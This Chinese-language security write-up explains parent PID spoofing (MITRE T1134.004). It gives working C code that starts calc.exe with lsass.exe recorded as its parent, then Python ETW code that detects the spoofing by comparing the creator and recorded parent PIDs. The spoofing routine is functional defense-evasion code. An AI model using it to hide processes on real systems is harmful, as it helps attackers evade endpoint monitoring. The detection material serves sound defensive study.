在使用 CreateProcess 函数创建新进程时，可以先通过 InitializeProcThreadAttributeList / UpdateProcThreadAttribute 函数向 STARTUPINFOEXA 结构体的 lpAttributeList 成员写入 PROC_THREAD_ATTRIBUTE_PARENT_PROCESS 属性（属性值为目标进程的句柄，该句柄至少需要 PROCESS_CREATE_PROCESS 访问权限），再带 EXTENDED_STARTUPINFO_PRESENT 标志调用 CreateProcess，从而人为指定子进程的父进程，即“父进程欺骗”（MITRE ATT&CK T1134.004）。具体代码如下：
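#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

/*
 * Launch exePath so that the kernel records hParent as its parent process
 * (PROC_THREAD_ATTRIBUTE_PARENT_PROCESS). hParent must have been opened with
 * at least PROCESS_CREATE_PROCESS. Returns the new process id, or 0 on failure
 * after printing which call failed together with GetLastError().
 */
static DWORD SpawnWithSpoofedParent(const char* exePath, HANDLE hParent)
{
    STARTUPINFOEXA si;
    PROCESS_INFORMATION pi;
    SIZE_T attrListSize = 0;
    DWORD childPid = 0;

    ZeroMemory(&si, sizeof(si));
    ZeroMemory(&pi, sizeof(pi));
    si.StartupInfo.cb = sizeof(si);   /* EXTENDED_STARTUPINFO_PRESENT needs the extended size */

    /* Sizing call: expected to fail with ERROR_INSUFFICIENT_BUFFER and only
       fill in attrListSize, so its return value is deliberately ignored. */
    InitializeProcThreadAttributeList(NULL, 1, 0, &attrListSize);
    si.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, attrListSize);
    if (si.lpAttributeList == NULL) {
        printf("HeapAlloc(%lu) failed\n", (unsigned long)attrListSize);
        return 0;
    }
    if (!InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &attrListSize)) {
        printf("InitializeProcThreadAttributeList failed: %lu\n", GetLastError());
        HeapFree(GetProcessHeap(), 0, si.lpAttributeList);
        return 0;
    }

    /* The attribute value is the HANDLE itself, so pass its address and size. */
    if (!UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS,
                                   &hParent, sizeof(HANDLE), NULL, NULL)) {
        printf("UpdateProcThreadAttribute failed: %lu\n", GetLastError());
    } else {
        /* bInheritHandles=TRUE as in the original; note that with a spoofed
           parent the inheritable handles come from hParent's handle table, not
           from this process. CreateProcessA does not write to lpCommandLine
           (only CreateProcessW may), so the const cast is safe here. */
        if (!CreateProcessA(NULL, (LPSTR)exePath, NULL, NULL, TRUE,
                            EXTENDED_STARTUPINFO_PRESENT | CREATE_NEW_CONSOLE,
                            NULL, NULL, &si.StartupInfo, &pi)) {
            printf("CreateProcessA failed: %lu\n", GetLastError());
        } else {
            childPid = pi.dwProcessId;
            CloseHandle(pi.hThread);
            CloseHandle(pi.hProcess);
        }
    }

    /* The list must be deleted before its backing memory is released, and the
       HeapFree flags must match HeapAlloc (the original allocated with 0 but
       freed with HEAP_NO_SERIALIZE on the shared process heap). */
    DeleteProcThreadAttributeList(si.lpAttributeList);
    HeapFree(GetProcessHeap(), 0, si.lpAttributeList);
    return childPid;
}

/*
 * Parent PID spoofing demo: start calc.exe with an arbitrary process recorded
 * as its parent (default PID 588, lsass.exe in the write-up).
 *
 * Usage: parent.exe [parent_pid]
 * Returns 0 on success and 1 on any failure.
 */
int main(int argc, char* argv[])
{
    /* Backslashes must be escaped: "C:\windows\system32\calc.exe" as written in
       the original is parsed as the escape sequences \w, \s and \c. */
    const char* exePath = "C:\\windows\\system32\\calc.exe";
    DWORD parentPid = 588;
    HANDLE hParent;
    DWORD childPid;

    if (argc > 1) {
        parentPid = (DWORD)strtoul(argv[1], NULL, 10);
        if (parentPid == 0) {
            printf("invalid parent pid: %s\n", argv[1]);
            return 1;
        }
    }

    /* PROCESS_CREATE_PROCESS is the only right PROC_THREAD_ATTRIBUTE_PARENT_PROCESS
       requires; PROCESS_ALL_ACCESS is excessive and more likely to be denied
       (e.g. on an lsass.exe running as a protected process). */
    hParent = OpenProcess(PROCESS_CREATE_PROCESS, FALSE, parentPid);
    if (hParent == NULL) {
        printf("OpenProcess(%lu) failed: %lu\n", parentPid, GetLastError());
        return 1;
    }

    childPid = SpawnWithSpoofedParent(exePath, hParent);
    CloseHandle(hParent);   /* the original never closed this handle */
    if (childPid == 0) {
        return 1;
    }
    printf("created %s (pid %lu) with parent recorded as pid %lu\n", exePath, childPid, parentPid);
    return 0;
}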
实际效果如下图。parent.exe(pid:3960) 进程创建了 calc.exe(pid:2276) 进程，但进程浏览器（Process Explorer）显示 lsass.exe(pid:588) 是其父进程——因为它读取的是内核为子进程记录的 ParentProcessId，而该值已被上述属性改写。注意：若系统开启了 LSA 保护（RunAsPPL），普通进程通常无法以 PROCESS_CREATE_PROCESS 权限打开 lsass.exe，此时 OpenProcess 会失败，需换用其他进程作为演示用的“父进程”。
检测方法：可以使用 Windows 事件跟踪（ETW）的 Microsoft-Windows-Kernel-Process 提供程序来判断是否发生了父进程欺骗——其进程创建事件的事件头 ProcessId 字段记录的是真正调用 CreateProcess 的进程，而事件负载中的 ParentProcessID 是内核记录的（可被欺骗的）父进程，二者不一致即为可疑。这里使用火眼（FireEye）在 GitHub 上的 python3 项目 pywintrace 进行采集（需要管理员权限才能开启内核提供程序的跟踪会话），具体代码如下：
import contextlib
import sys
import time

import etw
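def _to_pid(value):
    """Coerce an ETW field to an int pid; None if absent or not numeric.

    pywintrace renders payload fields as strings but keeps the header's
    ProcessId as an int, so both spellings have to be accepted.
    """
    if value is None or isinstance(value, bool):
        return None
    try:
        return int(value)
    except (TypeError, ValueError):
        return None


def find_spoofed_parent(event):
    """Return (creator_pid, recorded_parent_pid, child_pid) when *event* is a
    process-creation event whose creator differs from its recorded parent,
    otherwise None.

    PROC_THREAD_ATTRIBUTE_PARENT_PROCESS changes the ParentProcessID the
    kernel stores for the child, but the ETW event header's ProcessId is
    still the process that actually called CreateProcess; a mismatch between
    the two is the spoofing signal.

    ``event`` is what pywintrace hands to ``event_callback``: a
    ``(event_id, fields)`` tuple whose ``fields`` dict holds the header under
    ``"EventHeader"`` (with ``"ProcessId"``) and the payload fields
    ``"ProcessID"`` / ``"ParentProcessID"`` at top level. A bare dict is also
    accepted. Anything else, or an event missing one of the three fields
    (ProcessStop, ThreadStart, ImageLoad, ...), yields None.
    NOTE(review): field names follow the pywintrace output quoted in the
    write-up; confirm against the installed pywintrace version.
    """
    if isinstance(event, (tuple, list)) and len(event) == 2:
        event = event[1]
    if not isinstance(event, dict):
        return None
    header = event.get("EventHeader")
    creator = _to_pid(header.get("ProcessId")) if isinstance(header, dict) else None
    recorded_parent = _to_pid(event.get("ParentProcessID"))
    child = _to_pid(event.get("ProcessID"))
    if creator is None or recorded_parent is None or child is None:
        return None
    if creator == recorded_parent:
        return None
    return (creator, recorded_parent, child)


def some_func(duration=10):
    """Capture Microsoft-Windows-Kernel-Process events for *duration* seconds.

    Every event is printed as before (so the manual comparison in the
    write-up still works); in addition, any process-creation event whose
    creating process differs from its recorded parent gets a
    ``PARENT PID SPOOFING?`` line. Legitimate software also sets a parent
    explicitly (UAC elevation is the usual example), so treat hits as leads
    to correlate with image paths, not as verdicts.

    Starting a trace on the Kernel-Process provider normally requires an
    elevated (administrator) session.
    """
    providers = [
        etw.ProviderInfo(
            'Microsoft-Windows-Kernel-Process',
            etw.GUID("{22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716}"),
        )
    ]

    def on_event(event):
        print(event)
        hit = find_spoofed_parent(event)
        if hit is not None:
            creator, recorded_parent, child = hit
            print("PARENT PID SPOOFING? child pid %d was created by pid %d "
                  "but its parent is recorded as pid %d"
                  % (child, creator, recorded_parent))

    job = etw.ETW(providers=providers, event_callback=on_event)
    job.start()
    try:
        time.sleep(duration)
    finally:
        # Always stop the session; otherwise a Ctrl-C during the sleep may
        # leave the ETW trace running after this script exits.
        job.stop()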
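def main(output_path=r"D:\a"):
    """Run the capture and write every printed line to *output_path*.

    Output goes to a file rather than the console because a 10-second
    Kernel-Process capture emits far more events than a terminal keeps.
    """
    # The original spelled the path "D:\a", which Python reads as "D:" plus a
    # BEL (0x07) character; the raw string keeps the backslash literal.
    # redirect_stdout puts sys.stdout back even if the capture raises, and the
    # with-block closes the file; the original did neither on an error path.
    with open(output_path, "w", encoding="utf-8") as out, contextlib.redirect_stdout(out):
        some_func()


# Guard lets the helpers above be imported without starting a capture.
if __name__ == "__main__":
    main()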
打开输出结果文件,出现3个进程ID,分别是:
ProcessId:3960、ProcessID:2276、ParentProcessID:588
ProcessId（事件头 EventHeader 中的字段）：真正调用 CreateProcess 的进程，即实际父进程；ProcessID：新创建的子进程；ParentProcessID：内核记录的、被欺骗后的父进程。
ProcessId 与 ParentProcessID 不同，说明创建 calc.exe(pid:2276) 进程时人为指定了其父进程。需要注意，合法场景下也会出现这种不一致（例如 UAC 提权时由 appinfo 服务所在的 svchost.exe 代为创建进程），因此检测规则应结合创建者与所记录父进程的映像路径做白名单过滤，而不是对所有不一致一律告警。
结果如下:
参考地址https://www.anquanke.com/post/id/168618
https://blog.f-secure.com/detecting-parent-pid-spoofing/
https://github.com/fireeye/pywintrace



